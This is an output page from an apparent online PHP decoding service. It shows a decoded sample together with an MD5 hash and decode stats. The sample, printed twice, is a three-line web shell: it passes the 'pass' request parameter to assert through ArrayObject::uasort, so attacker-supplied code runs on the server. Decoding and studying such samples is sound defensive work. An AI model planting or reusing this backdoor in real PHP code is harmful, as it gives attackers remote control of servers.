Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $arr = new ArrayObject(array('test', $_REQUEST['pass'])); $arr->uasort('assert'); ..
Decoded Output download
<?php
$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');
?>
Did this file decode correctly?
Original Code
<?php
$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');
?>
Function Calls
None |
Stats
MD5 | 7e651fc0cec4ed9dae1a9aa908a734d1 |
Eval Count | 0 |
Decode Time | 118 ms |